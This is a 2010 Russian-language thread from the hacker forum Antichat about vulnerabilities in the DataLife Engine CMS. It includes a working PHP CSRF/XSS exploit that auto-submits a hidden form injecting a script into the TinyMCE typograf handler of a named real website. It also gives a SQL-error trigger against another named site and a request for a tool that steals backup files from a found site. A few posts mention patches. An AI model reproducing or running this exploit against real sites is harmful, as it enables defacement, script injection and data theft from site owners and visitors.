Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
31.05.2010, 23:05
|
|
Новичок
Регистрация: 20.11.2009
Сообщений: 17
Провел на форуме:
23696
Репутация:
-4
|
|
Код:
http://forum.searchengines.ru/showthread.php?t=504108
Приветствую, уважаемые!
В последние несколько дней были взломаны сайты типа осетрина, amxсервер и т.д. мегакулхацкерами, думаю они на этом не остановятся, поэтому палю заплатку для новорожденной дыры - поставить права 765 на папку data.
детали не известны |
|
|
02.06.2010, 11:30
|
|
Новичок
Регистрация: 14.05.2010
Сообщений: 2
Провел на форуме:
22300
Репутация:
5
|
|
Вот недавно нашёл багу.
В зависимости от чпу выполняем запрос
Например:
Код:
http://skripters.com/dle_haki/page/9999999999999999999/
Получаем:
Код:
MySQL Error! ------------------------ The Error returned was: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '7.3786976294838E+19,8' at line 1 Error Number: 1064
Я думаю найдёте применение 
Неоткажусь от ++ |
|
|
|
03.06.2010, 08:16
|
|
Познающий
Регистрация: 29.08.2009
Сообщений: 75
Провел на форуме:
315861
Репутация:
5
|
|
Я где то слышал что была софтина, которая ворует бэкапы - если он есть на сайте в папке backup. Не подскажите? сайтик нашел, папка бэкап есть имя бэкапа не могу подобрать  |
|
|
|
04.06.2010, 11:37
|
|
Новичок
Регистрация: 24.04.2010
Сообщений: 3
Провел на форуме:
17830
Репутация:
1
|
|
Сообщение от EoGeneo
Я где то слышал что была софтина, которая ворует бэкапы - если он есть на сайте в папке backup. Не подскажите? сайтик нашел, папка бэкап есть имя бэкапа не могу подобрать
|
|
|
|
05.06.2010, 01:40
|
|
Новичок
Регистрация: 24.04.2010
Сообщений: 3
Провел на форуме:
17830
Репутация:
1
|
|
Хм,кто нить тут отпишется как юзать багу с помощью "Tiny MCE редактор"
|
|
|
|
05.06.2010, 11:28
|
|
Новичок
Регистрация: 27.12.2009
Сообщений: 6
Провел на форуме:
26960
Репутация:
6
|
|
Работает любой хтмл тег отосланный пост запросом на engine/editor/jscripts/tiny_mce/plugins/typograf/handler.php
ТИПА ЭКСПЛОИТ
PHP код:
PHP код:
<?php
$value = urlencode("<script>alert('HACKED BY KZPROMO trololo');</script>");
if($_GET['unset'] == "time") unset($_COOKIE['time']);
if(!isset($_COOKIE['time']))
{
setcookie("time",time(),time()+3600);
echo <<<HTML
<html>
<head>
</head>
<body>
<center>
<form name="hack" action="https://gomel-sat.net/engine/editor/jscripts/tiny_mce/plugins/typograf/handler.php" method="post">
<input type="text" name="text" value='$value' style="boder:none;FONT: 0px Tahoma; border:0px solid #FFFFFF;" border="0">
</form>
<script>
document.hack.submit();
</script>
</body>
</html>
HTML;
}
else {
header("Content-type: image/jpg");
$image = imagecreatefromgif('smile.jpg');
imagegif($image);
imagedestroy($image);
}
?>
Автор: kzpromo |
|
|
|
05.06.2010, 16:46
|
|
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
Провел на форуме:
5749763
Репутация:
1680
|
|
Я подстолом. Сорри за оффтоп, но теперь уже и под пассивные XSS у нас сплойты пишут
|
|
|
|
06.06.2010, 01:19
|
|
Новичок
Регистрация: 22.08.2009
Сообщений: 1
Провел на форуме:
83171
Репутация:
0
|
|
Есть ли способ увидеть имя БД в новых версиях DLE (8.2-8.5)?
|
|
|
|
06.06.2010, 11:21
|
|
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
Провел на форуме:
12942062
Репутация:
1550
|
|
Сообщение от Nightmarе
Я подстолом. Сорри за оффтоп, но теперь уже и под пассивные XSS у нас сплойты пишут
Ну а если там только post, как иначе?
|
|
|
|
07.06.2010, 03:10
|
|
Познающий
Регистрация: 25.11.2009
Сообщений: 31
Провел на форуме:
100433
Репутация:
0
|
|
извиняюсь, если было, но может кто подскажет как взламывали недавно сайты, например zerx.ru .
Вот заплатка от взлома http://dle-news.ru/bags/v85/1037-provedenie-ataki-mezhsajtovogo-skriptinga-xss.html
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
